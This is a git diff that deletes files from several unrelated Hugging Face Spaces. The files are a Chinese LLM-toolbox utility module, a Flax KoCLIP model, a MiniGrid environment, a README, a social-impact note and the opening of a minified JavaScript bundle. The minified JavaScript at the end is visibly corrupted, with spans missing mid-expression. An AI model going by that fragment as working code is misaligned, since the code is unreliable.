- import glob - from toolbox import extract_archive - try: - shutil.rmtree('./private_upload/') - except: - pass - time_tag = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime()) - os.makedirs(f'private_upload/{time_tag}', exist_ok=True) - err_msg = '' - for file in files: - file_origin_name = os.path.basename(file.orig_name) - shutil.copy(file.name, f'private_upload/{time_tag}/{file_origin_name}') - err_msg += extract_archive(f'private_upload/{time_tag}/{file_origin_name}', - dest_dir=f'private_upload/{time_tag}/{file_origin_name}.extract') - moved_files = [fp for fp in glob.glob('private_upload/**/*', recursive=True)] - if "底部输入区" in checkboxes: - txt = "" - txt2 = f'private_upload/{time_tag}' - else: - txt = f'private_upload/{time_tag}' - txt2 = "" - moved_files_str = '\t\n\n'.join(moved_files) - chatbot.append(['我上传了文件,请查收', - f'[Local Message] 收到以下文件: \n\n{moved_files_str}' + - f'\n\n调用路径参数已自动修正到: \n\n{txt}' + - f'\n\n现在您点击任意“红颜色”标识的函数插件时,以上文件将被作为输入参数'+err_msg]) - return chatbot, txt, txt2 - - -def on_report_generated(files, chatbot): - from toolbox import find_recent_files - report_files = find_recent_files('gpt_log') - if len(report_files) == 0: - return None, chatbot - # files.extend(report_files) - chatbot.append(['汇总报告如何远程获取?', '汇总报告已经添加到右侧“文件上传区”(可能处于折叠状态),请查收。']) - return report_files, chatbot - -def is_openai_api_key(key): - API_MATCH_ORIGINAL = re.match(r"sk-[a-zA-Z0-9]{48}$", key) - API_MATCH_AZURE = re.match(r"[a-zA-Z0-9]{32}$", key) - return bool(API_MATCH_ORIGINAL) or bool(API_MATCH_AZURE) - -def is_api2d_key(key): - if key.startswith('fk') and len(key) == 41: - return True - else: - return False - -def is_any_api_key(key): - if ',' in key: - keys = key.split(',') - for k in keys: - if is_any_api_key(k): return True - return False - else: - return is_openai_api_key(key) or is_api2d_key(key) - -def what_keys(keys): - avail_key_list = {'OpenAI Key':0, "API2D Key":0} - key_list = keys.split(',') - - for k in key_list: - if is_openai_api_key(k): - avail_key_list['OpenAI Key'] += 1 - - for k in key_list: - if is_api2d_key(k): - avail_key_list['API2D Key'] += 1 - - return f"检测到: OpenAI Key {avail_key_list['OpenAI Key']} 个,API2D Key {avail_key_list['API2D Key']} 个" - -def select_api_key(keys, llm_model): - import random - avail_key_list = [] - key_list = keys.split(',') - - if llm_model.startswith('gpt-'): - for k in key_list: - if is_openai_api_key(k): avail_key_list.append(k) - - if llm_model.startswith('api2d-'): - for k in key_list: - if is_api2d_key(k): avail_key_list.append(k) - - if len(avail_key_list) == 0: - raise RuntimeError(f"您提供的api-key不满足要求,不包含任何可用于{llm_model}的api-key。您可能选择了错误的模型或请求源。") - - api_key = random.choice(avail_key_list) # 随机负载均衡 - return api_key - -@lru_cache(maxsize=128) -def read_single_conf_with_lru_cache(arg): - from colorful import print亮红, print亮绿, print亮蓝 - try: - r = getattr(importlib.import_module('config_private'), arg) - except: - r = getattr(importlib.import_module('config'), arg) - # 在读取API_KEY时,检查一下是不是忘了改config - if arg == 'API_KEY': - print亮蓝(f"[API_KEY] 本项目现已支持OpenAI和API2D的api-key。也支持同时填写多个api-key,如API_KEY=\"openai-key1,openai-key2,api2d-key3\"") - print亮蓝(f"[API_KEY] 您既可以在config.py中修改api-key(s),也可以在问题输入区输入临时的api-key(s),然后回车键提交后即可生效。") - if is_any_api_key(r): - print亮绿(f"[API_KEY] 您的 API_KEY 是: {r[:15]}*** API_KEY 导入成功") - else: - print亮红( "[API_KEY] 正确的 API_KEY 是'sk'开头的51位密钥(OpenAI),或者 'fk'开头的41位密钥,请在config文件中修改API密钥之后再运行。") - if arg == 'proxies': - if r is None: - print亮红('[PROXY] 网络代理状态:未配置。无代理状态下很可能无法访问OpenAI家族的模型。建议:检查USE_PROXY选项是否修改。') - else: - print亮绿('[PROXY] 网络代理状态:已配置。配置信息如下:', r) - assert isinstance(r, dict), 'proxies格式错误,请注意proxies选项的格式,不要遗漏括号。' - return r - - -def get_conf(*args): - # 建议您复制一个config_private.py放自己的秘密, 如API和代理网址, 避免不小心传github被别人看到 - res = [] - for arg in args: - r = read_single_conf_with_lru_cache(arg) - res.append(r) - return res - - -def clear_line_break(txt): - txt = txt.replace('\n', ' ') - txt = txt.replace(' ', ' ') - txt = txt.replace(' ', ' ') - return txt - - -class DummyWith(): - """ - 这段代码定义了一个名为DummyWith的空上下文管理器, - 它的作用是……额……就是不起作用,即在代码结构不变得情况下取代其他的上下文管理器。 - 上下文管理器是一种Python对象,用于与with语句一起使用, - 以确保一些资源在代码块执行期间得到正确的初始化和清理。 - 上下文管理器必须实现两个方法,分别为 __enter__()和 __exit__()。 - 在上下文执行开始的情况下,__enter__()方法会在代码块被执行前被调用, - 而在上下文执行结束时,__exit__()方法则会被调用。 - """ - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_value, traceback): - return - -def run_gradio_in_subpath(demo, auth, port, custom_path): - """ - 把gradio的运行地址更改到指定的二次路径上 - """ - def is_path_legal(path: str)->bool: - ''' - check path for sub url - path: path to check - return value: do sub url wrap - ''' - if path == "/": return True - if len(path) == 0: - print("ilegal custom path: {}\npath must not be empty\ndeploy on root url".format(path)) - return False - if path[0] == '/': - if path[1] != '/': - print("deploy on sub-path {}".format(path)) - return True - return False - print("ilegal custom path: {}\npath should begin with \'/\'\ndeploy on root url".format(path)) - return False - - if not is_path_legal(custom_path): raise RuntimeError('Ilegal custom path') - import uvicorn - import gradio as gr - from fastapi import FastAPI - app = FastAPI() - if custom_path != "/": - @app.get("/") - def read_main(): - return {"message": f"Gradio is running at: {custom_path}"} - app = gr.mount_gradio_app(app, demo, path=custom_path) - uvicorn.run(app, host="0.0.0.0", port=port) # , auth=auth - - -def clip_history(inputs, history, tokenizer, max_token_limit): - """ - reduce the length of history by clipping. - this function search for the longest entries to clip, little by little, - until the number of token of history is reduced under threshold. - 通过裁剪来缩短历史记录的长度。 - 此函数逐渐地搜索最长的条目进行剪辑, - 直到历史记录的标记数量降低到阈值以下。 - """ - import numpy as np - from request_llm.bridge_all import model_info - def get_token_num(txt): - return len(tokenizer.encode(txt, disallowed_special=())) - input_token_num = get_token_num(inputs) - if input_token_num < max_token_limit * 3 / 4: - # 当输入部分的token占比小于限制的3/4时,裁剪时 - # 1. 把input的余量留出来 - max_token_limit = max_token_limit - input_token_num - # 2. 把输出用的余量留出来 - max_token_limit = max_token_limit - 128 - # 3. 如果余量太小了,直接清除历史 - if max_token_limit < 128: - history = [] - return history - else: - # 当输入部分的token占比 > 限制的3/4时,直接清除历史 - history = [] - return history - - everything = [''] - everything.extend(history) - n_token = get_token_num('\n'.join(everything)) - everything_token = [get_token_num(e) for e in everything] - - # 截断时的颗粒度 - delta = max(everything_token) // 16 - - while n_token > max_token_limit: - where = np.argmax(everything_token) - encoded = tokenizer.encode(everything[where], disallowed_special=()) - clipped_encoded = encoded[:len(encoded)-delta] - everything[where] = tokenizer.decode(clipped_encoded)[:-1] # -1 to remove the may-be illegal char - everything_token[where] = get_token_num(everything[where]) - n_token = get_token_num('\n'.join(everything)) - - history = everything[1:] - return history diff --git a/spaces/flax-community/koclip/koclip/model.py b/spaces/flax-community/koclip/koclip/model.py deleted file mode 100644 index 5cef2f7d22ab358e90049b7012c09faf70af6e07..0000000000000000000000000000000000000000 --- a/spaces/flax-community/koclip/koclip/model.py +++ /dev/null @@ -1,471 +0,0 @@ -# coding=utf-8 -# Copyright 2021 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from typing import Optional, Tuple - -import flax.linen as nn -import jax -import jax.numpy as jnp -from flax.core.frozen_dict import FrozenDict -from transformers import FLAX_MODEL_MAPPING, FlaxCLIPVisionModel -from transformers.modeling_flax_utils import FlaxPreTrainedModel -from transformers.models.clip.modeling_flax_clip import FlaxCLIPOutput -from transformers.utils import logging - -from .config import HybridCLIPConfig - -logger = logging.get_logger(__name__) - - -class FlaxHybridCLIPModule(nn.Module): - config: HybridCLIPConfig - dtype: jnp.dtype = jnp.float32 - - def setup(self): - text_config = self.config.text_config - vision_config = self.config.vision_config - - self.projection_dim = self.config.projection_dim - self.text_embed_dim = text_config.hidden_size - self.vision_embed_dim = vision_config.hidden_size - - text_module = FLAX_MODEL_MAPPING[self.config.text_config.__class__].module_class - vision_module = FLAX_MODEL_MAPPING.get( - self.config.vision_config.__class__, FlaxCLIPVisionModel - ).module_class - - self.text_model = text_module(text_config, dtype=self.dtype) - self.vision_model = vision_module(vision_config, dtype=self.dtype) - - self.visual_projection = nn.Dense( - self.projection_dim, - dtype=self.dtype, - kernel_init=jax.nn.initializers.normal(0.02, dtype=self.dtype), - use_bias=False, - ) - self.text_projection = nn.Dense( - self.projection_dim, - dtype=self.dtype, - kernel_init=jax.nn.initializers.normal(0.02, dtype=self.dtype), - use_bias=False, - ) - self.logit_scale = self.param("logit_scale", jax.nn.initializers.ones, []) - - def __call__( - self, - input_ids=None, - pixel_values=None, - attention_mask=None, - position_ids=None, - token_type_ids=None, - deterministic: bool = True, - output_attentions=None, - output_hidden_states=None, - return_dict=None, - ): - return_dict = ( - return_dict if return_dict is not None else self.config.return_dict - ) - - vision_outputs = self.vision_model( - pixel_values=pixel_values, - deterministic=deterministic, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - text_outputs = self.text_model( - input_ids=input_ids, - attention_mask=attention_mask, - token_type_ids=token_type_ids, - position_ids=position_ids, - deterministic=deterministic, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - image_embeds = vision_outputs[1] - image_embeds = self.visual_projection(image_embeds) - - text_embeds = text_outputs[1] - text_embeds = self.text_projection(text_embeds) - - # normalized features - image_embeds = image_embeds / jnp.linalg.norm( - image_embeds, axis=-1, keepdims=True - ) - text_embeds = text_embeds / jnp.linalg.norm(text_embeds, axis=-1, keepdims=True) - - # cosine similarity as logits - logit_scale = jnp.exp(self.logit_scale) - logits_per_text = jnp.matmul(text_embeds, image_embeds.T) * logit_scale - logits_per_image = logits_per_text.T - - if not return_dict: - return ( - logits_per_image, - logits_per_text, - text_embeds, - image_embeds, - text_outputs, - vision_outputs, - ) - - return FlaxCLIPOutput( - logits_per_image=logits_per_image, - logits_per_text=logits_per_text, - text_embeds=text_embeds, - image_embeds=image_embeds, - text_model_output=text_outputs, - vision_model_output=vision_outputs, - ) - - -class FlaxHybridCLIP(FlaxPreTrainedModel): - config_class = HybridCLIPConfig - module_class = FlaxHybridCLIPModule - - def __init__( - self, - config: HybridCLIPConfig, - input_shape: Optional[Tuple] = None, - seed: int = 0, - dtype: jnp.dtype = jnp.float32, - **kwargs, - ): - if input_shape is None: - input_shape = ( - (1, 1), - ( - 1, - config.vision_config.image_size, - config.vision_config.image_size, - 3, - ), - ) - - module = self.module_class(config=config, dtype=dtype, **kwargs) - super().__init__( - config, module, input_shape=input_shape, seed=seed, dtype=dtype - ) - - def init_weights(self, rng: jax.random.PRNGKey, input_shape: Tuple) -> FrozenDict: - # init input tensor - input_ids = jnp.zeros(input_shape[0], dtype="i4") - position_ids = jnp.broadcast_to( - jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_shape[0] - ) - token_type_ids = jnp.ones_like(input_ids) - attention_mask = jnp.ones_like(input_ids) - - pixel_values = jax.random.normal(rng, input_shape[1]) - - params_rng, dropout_rng = jax.random.split(rng) - rngs = {"params": params_rng, "dropout": dropout_rng} - - return self.module.init( - rngs, input_ids, pixel_values, attention_mask, position_ids, token_type_ids - )["params"] - - def __call__( - self, - input_ids, - pixel_values, - attention_mask=None, - position_ids=None, - token_type_ids=None, - params: dict = None, - dropout_rng: jax.random.PRNGKey = None, - train: bool = False, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ): - output_attentions = ( - output_attentions - if output_attentions is not None - else self.config.output_attentions - ) - output_hidden_states = ( - output_hidden_states - if output_hidden_states is not None - else self.config.output_hidden_states - ) - return_dict = ( - return_dict if return_dict is not None else self.config.return_dict - ) - - if position_ids is None: - position_ids = jnp.broadcast_to( - jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape - ) - - if token_type_ids is None: - token_type_ids = jnp.zeros_like(input_ids) - - if attention_mask is None: - attention_mask = jnp.ones_like(input_ids) - - # Handle any PRNG if needed - rngs = {} - if dropout_rng is not None: - rngs["dropout"] = dropout_rng - - return self.module.apply( - {"params": params or self.params}, - jnp.array(input_ids, dtype="i4"), - jnp.array(pixel_values, dtype=jnp.float32), - jnp.array(attention_mask, dtype="i4"), - jnp.array(position_ids, dtype="i4"), - jnp.array(token_type_ids, dtype="i4"), - not train, - output_attentions, - output_hidden_states, - return_dict, - rngs=rngs, - ) - - def get_text_features( - self, - input_ids, - attention_mask=None, - position_ids=None, - token_type_ids=None, - dropout_rng: jax.random.PRNGKey = None, - train=False, - ): - r""" - Args: - input_ids (:obj:`numpy.ndarray` of shape :obj:`(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - Indices can be obtained using :class:`~transformers.PreTrainedTokenizer`. See - :meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` - for details. - `What are input IDs? <../glossary.html#input-ids>`__ - Returns: - text_features (:obj:`jax_xla.DeviceArray` of shape :obj:`(batch_size, output_dim`): The text embeddings - obtained by applying the projection layer to the pooled output of text model. - """ - if position_ids is None: - position_ids = jnp.broadcast_to( - jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape - ) - - if token_type_ids is None: - token_type_ids = jnp.zeros_like(input_ids) - - if attention_mask is None: - attention_mask = jnp.ones_like(input_ids) - - # Handle any PRNG if needed - rngs = {} - if dropout_rng is not None: - rngs["dropout"] = dropout_rng - - def _get_features( - module, - input_ids, - attention_mask, - position_ids, - token_type_ids, - deterministic, - ): - text_outputs = module.text_model( - input_ids=input_ids, - attention_mask=attention_mask, - position_ids=position_ids, - token_type_ids=token_type_ids, - deterministic=deterministic, - ) - pooled_output = text_outputs[1] - text_features = module.text_projection(pooled_output) - return text_features - - return self.module.apply( - {"params": self.params}, - jnp.array(input_ids, dtype="i4"), - jnp.array(attention_mask, dtype="i4"), - jnp.array(position_ids, dtype="i4"), - jnp.array(token_type_ids, dtype="i4"), - not train, - method=_get_features, - rngs=rngs, - ) - - def get_image_features( - self, pixel_values, dropout_rng: jax.random.PRNGKey = None, train=False - ): - r""" - Args: - pixel_values (:obj:`numpy.ndarray` of shape :obj:`(batch_size, num_channels, height, width)`): - Pixel values. Padding will be ignored by default should you provide it. Pixel values can be obtained - using :class:`~transformers.ImageFeatureExtractionMixin`. See - :meth:`transformers.ImageFeatureExtractionMixin.__call__` for details. - Returns: - image_features (:obj:`jax_xla.DeviceArray` of shape :obj:`(batch_size, output_dim`): The image embeddings - obtained by applying the projection layer to the pooled output of vision model. - """ - - # Handle any PRNG if needed - rngs = {} - if dropout_rng is not None: - rngs["dropout"] = dropout_rng - - def _get_features(module, pixel_values, deterministic): - vision_outputs = module.vision_model( - pixel_values=pixel_values, deterministic=deterministic - ) - pooled_output = vision_outputs[1] # pooled_output - image_features = module.visual_projection(pooled_output) - return image_features - - return self.module.apply( - {"params": self.params}, - jnp.array(pixel_values, dtype=jnp.float32), - not train, - method=_get_features, - rngs=rngs, - ) - - @classmethod - def from_text_vision_pretrained( - cls, - text_model_name_or_path: str = None, - vision_model_name_or_path: str = None, - *model_args, - **kwargs, - ) -> FlaxPreTrainedModel: - """ - Params: - text_model_name_or_path (:obj: `str`, `optional`): - Information necessary to initiate the text model. Can be either: - - A string, the `model id` of a pretrained model hosted inside a model repo on huggingface.co. - Valid model ids can be located at the root-level, like ``bert-base-uncased``, or namespaced under - a user or organization name, like ``dbmdz/bert-base-german-cased``. - - A path to a `directory` containing model weights saved using - :func:`~transformers.FlaxPreTrainedModel.save_pretrained`, e.g., ``./my_model_directory/``. - - A path or url to a `PyTorch checkpoint folder` (e.g, ``./pt_model``). In - this case, ``from_pt`` should be set to :obj:`True` and a configuration object should be provided - as ``config`` argument. This loading path is slower than converting the PyTorch checkpoint in - a Flax model using the provided conversion scripts and loading the Flax model afterwards. - vision_model_name_or_path (:obj: `str`, `optional`, defaults to `None`): - Information necessary to initiate the vision model. Can be either: - - A string, the `model id` of a pretrained model hosted inside a model repo on huggingface.co. - Valid model ids can be located at the root-level, like ``bert-base-uncased``, or namespaced under - a user or organization name, like ``dbmdz/bert-base-german-cased``. - - A path to a `directory` containing model weights saved using - :func:`~transformers.FlaxPreTrainedModel.save_pretrained`, e.g., ``./my_model_directory/``. - - A path or url to a `PyTorch checkpoint folder` (e.g, ``./pt_model``). In - this case, ``from_pt`` should be set to :obj:`True` and a configuration object should be provided - as ``config`` argument. This loading path is slower than converting the PyTorch checkpoint in - a Flax model using the provided conversion scripts and loading the Flax model afterwards. - model_args (remaining positional arguments, `optional`): - All remaning positional arguments will be passed to the underlying model's ``__init__`` method. - kwargs (remaining dictionary of keyword arguments, `optional`): - Can be used to update the configuration object (after it being loaded) and initiate the model (e.g., - :obj:`output_attentions=True`). - - To update the text configuration, use the prefix `text_` for each configuration parameter. - - To update the vision configuration, use the prefix `vision_` for each configuration parameter. - - To update the parent model configuration, do not use a prefix for each configuration parameter. - Behaves differently depending on whether a :obj:`config` is provided or automatically loaded. - Example:: - >>> from transformers import FlaxHybridCLIP - >>> # initialize a model from pretrained BERT and CLIP models. Note that the projection layers will be randomly initialized. - >>> # If using CLIP's vision model the vision projection layer will be initialized using pre-trained weights - >>> model = FlaxHybridCLIP.from_text_vision_pretrained('bert-base-uncased', 'openai/clip-vit-base-patch32') - >>> # saving model after fine-tuning - >>> model.save_pretrained("./bert-clip") - >>> # load fine-tuned model - >>> model = FlaxHybridCLIP.from_pretrained("./bert-clip") - """ - - kwargs_text = { - argument[len("text_") :]: value - for argument, value in kwargs.items() - if argument.startswith("text_") - } - - kwargs_vision = { - argument[len("vision_") :]: value - for argument, value in kwargs.items() - if argument.startswith("vision_") - } - - # remove text, vision kwargs from kwargs - for key in kwargs_text.keys(): - del kwargs["text_" + key] - for key in kwargs_vision.keys(): - del kwargs["vision_" + key] - - # Load and initialize the text and vision model - text_model = kwargs_text.pop("model", None) - if text_model is None: - assert ( - text_model_name_or_path is not None - ), "If `model` is not defined as an argument, a `text_model_name_or_path` has to be defined" - from transformers import FlaxAutoModel - - if "config" not in kwargs_text: - from transformers import AutoConfig - - text_config = AutoConfig.from_pretrained(text_model_name_or_path) - kwargs_text["config"] = text_config - - text_model = FlaxAutoModel.from_pretrained( - text_model_name_or_path, *model_args, **kwargs_text - ) - - vision_model = kwargs_vision.pop("model", None) - if vision_model is None: - assert ( - vision_model_name_or_path is not None - ), "If `model` is not defined as an argument, a `vision_model_name_or_path` has to be defined" - from transformers import FlaxAutoModel - - if "config" not in kwargs_vision: - from transformers import AutoConfig - - vision_config = AutoConfig.from_pretrained(vision_model_name_or_path) - kwargs_vision["config"] = vision_config - - vision_model = FlaxAutoModel.from_pretrained( - vision_model_name_or_path, *model_args, **kwargs_vision - ) - - # instantiate config with corresponding kwargs - dtype = kwargs.pop("dtype", jnp.float32) - config = HybridCLIPConfig.from_text_vision_configs( - text_model.config, vision_model.config, **kwargs - ) - - # init model - model = cls(config, *model_args, dtype=dtype, **kwargs) - - if vision_config.model_type == "clip": - model.params["vision_model"]["vision_model"] = vision_model.params[ - "vision_model" - ] - model.params["visual_projection"]["kernel"] = vision_model.params[ - "visual_projection" - ]["kernel"] - else: - model.params["vision_model"] = vision_model.params - - model.params["text_model"] = text_model.params - - return model diff --git a/spaces/flax-community/spanish-image-captioning/sections/social_impact.md b/spaces/flax-community/spanish-image-captioning/sections/social_impact.md deleted file mode 100644 index 3e2065b825c524f494af3f5fc5f99a4c7f043e45..0000000000000000000000000000000000000000 --- a/spaces/flax-community/spanish-image-captioning/sections/social_impact.md +++ /dev/null @@ -1,4 +0,0 @@ -## Social Impact -Being able to automatically describe the content of an image using properly formed sentences in any language is a challenging task, but it could have great impact by helping visually impaired people better understand their surroundings. - -Our initial plan was to work with a low-resource language only. However, the existing translations do not perform as well and we would have received poor labels and hence we did not pursue this further. \ No newline at end of file diff --git a/spaces/flowers-team/SocialAISchool/gym-minigrid/gym_minigrid/envs/putnear.py b/spaces/flowers-team/SocialAISchool/gym-minigrid/gym_minigrid/envs/putnear.py deleted file mode 100644 index 19ee1a534e2c805a7de3784d90ddecd8a9f2b2db..0000000000000000000000000000000000000000 --- a/spaces/flowers-team/SocialAISchool/gym-minigrid/gym_minigrid/envs/putnear.py +++ /dev/null @@ -1,126 +0,0 @@ -from gym_minigrid.minigrid import * -from gym_minigrid.register import register - -class PutNearEnv(MiniGridEnv): - """ - Environment in which the agent is instructed to place an object near - another object through a natural language string. - """ - - def __init__( - self, - size=6, - numObjs=2 - ): - self.numObjs = numObjs - - super().__init__( - grid_size=size, - max_steps=5*size, - # Set this to True for maximum speed - see_through_walls=True - ) - - def _gen_grid(self, width, height): - self.grid = Grid(width, height) - - # Generate the surrounding walls - self.grid.horz_wall(0, 0) - self.grid.horz_wall(0, height-1) - self.grid.vert_wall(0, 0) - self.grid.vert_wall(width-1, 0) - - # Types and colors of objects we can generate - types = ['key', 'ball', 'box'] - - objs = [] - objPos = [] - - def near_obj(env, p1): - for p2 in objPos: - dx = p1[0] - p2[0] - dy = p1[1] - p2[1] - if abs(dx) <= 1 and abs(dy) <= 1: - return True - return False - - # Until we have generated all the objects - while len(objs) < self.numObjs: - objType = self._rand_elem(types) - objColor = self._rand_elem(COLOR_NAMES) - - # If this object already exists, try again - if (objType, objColor) in objs: - continue - - if objType == 'key': - obj = Key(objColor) - elif objType == 'ball': - obj = Ball(objColor) - elif objType == 'box': - obj = Box(objColor) - - pos = self.place_obj(obj, reject_fn=near_obj) - - objs.append((objType, objColor)) - objPos.append(pos) - - # Randomize the agent start position and orientation - self.place_agent() - - # Choose a random object to be moved - objIdx = self._rand_int(0, len(objs)) - self.move_type, self.moveColor = objs[objIdx] - self.move_pos = objPos[objIdx] - - # Choose a target object (to put the first object next to) - while True: - targetIdx = self._rand_int(0, len(objs)) - if targetIdx != objIdx: - break - self.target_type, self.target_color = objs[targetIdx] - self.target_pos = objPos[targetIdx] - - self.mission = 'put the %s %s near the %s %s' % ( - self.moveColor, - self.move_type, - self.target_color, - self.target_type - ) - - def step(self, action): - preCarrying = self.carrying - - obs, reward, done, info = super().step(action) - - u, v = self.dir_vec - ox, oy = (self.agent_pos[0] + u, self.agent_pos[1] + v) - tx, ty = self.target_pos - - # If we picked up the wrong object, terminate the episode - if action == self.actions.pickup and self.carrying: - if self.carrying.type != self.move_type or self.carrying.color != self.moveColor: - done = True - - # If successfully dropping an object near the target - if action == self.actions.drop and preCarrying: - if self.grid.get(ox, oy) is preCarrying: - if abs(ox - tx) <= 1 and abs(oy - ty) <= 1: - reward = self._reward() - done = True - - return obs, reward, done, info - -class PutNear8x8N3(PutNearEnv): - def __init__(self): - super().__init__(size=8, numObjs=3) - -register( - id='MiniGrid-PutNear-6x6-N2-v0', - entry_point='gym_minigrid.envs:PutNearEnv' -) - -register( - id='MiniGrid-PutNear-8x8-N3-v0', - entry_point='gym_minigrid.envs:PutNear8x8N3' -) diff --git a/spaces/forklift-app/forklift-images/README.md b/spaces/forklift-app/forklift-images/README.md deleted file mode 100644 index cd02ce7ab375a51e447b4c73e71aa125ffb38caf..0000000000000000000000000000000000000000 --- a/spaces/forklift-app/forklift-images/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Forklift Images -emoji: 🐨 -colorFrom: gray -colorTo: gray -sdk: gradio -sdk_version: 3.14.0 -app_file: app.py -pinned: false ---- -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/furiosa-ai/ocr/static/js/main.87470711.js b/spaces/furiosa-ai/ocr/static/js/main.87470711.js deleted file mode 100644 index af5a0585199a4b7b97eb7420e1344772ac5653a3..0000000000000000000000000000000000000000 --- a/spaces/furiosa-ai/ocr/static/js/main.87470711.js +++ /dev/null @@ -1,3 +0,0 @@ -/*! For license information please see main.87470711.js.LICENSE.txt */ -!function(){var e={174:function(e,t,n){var r;e=n.nmd(e),function(o){var a=t,i=(e&&e.exports,"object"==typeof n.g&&n.g);i.global!==i&&i.window;var l=function(e){this.message=e};(l.prototype=new Error).name="InvalidCharacterError";var u=function(e){throw new l(e)},s="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",c=/[\t\n\f\r ]/g,f={encode:function(e){e=String(e),/[^\0-\xFF]/.test(e)&&u("The string to be encoded contains characters outside of the Latin1 range.");for(var t,n,r,o,a=e.length%3,i="",l=-1,c=e.length-a;++l>18&63)+s.charAt(o>>12&63)+s.charAt(o>>6&63)+s.charAt(63&o);return 2==a?(t=e.charCodeAt(l)<<8,n=e.charCodeAt(++l),i+=s.charAt((o=t+n)>>10)+s.charAt(o>>4&63)+s.charAt(o<<2&63)+"="):1==a&&(o=e.charCodeAt(l),i+=s.charAt(o>>2)+s.charAt(o<<4&63)+"=="),i},decode:function(e){var t=(e=String(e).replace(c,"")).length;t%4==0&&(t=(e=e.replace(/==?$/,"")).length),(t%4==1||/[^+a-zA-Z0-9/]/.test(e))&&u("Invalid character: the string to be decoded is not correctly encoded.");for(var n,r,o=0,a="",i=-1;++i>(-2*o&6)));return a},version:"1.0.0"};void 0===(r=function(){return f}.call(t,n,t,e))||(e.exports=r)}()},110:function(e,t,n){"use strict";var r=n(309),o={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},a={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},i={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},l={};function u(e){return r.isMemo(e)?i:l[e.$$typeof]||o}l[r.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},l[r.Memo]=i;var s=Object.defineProperty,c=Object.getOwnPropertyNames,f=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDescriptor,p=Object.getPrototypeOf,h=Object.prototype;e.exports=function e(t,n,r){if("string"!==typeof n){if(h){var o=p(n);o&&o!==h&&e(t,o,r)}var i=c(n);f&&(i=i.concat(f(n)));for(var l=u(t),v=u(n),m=0;m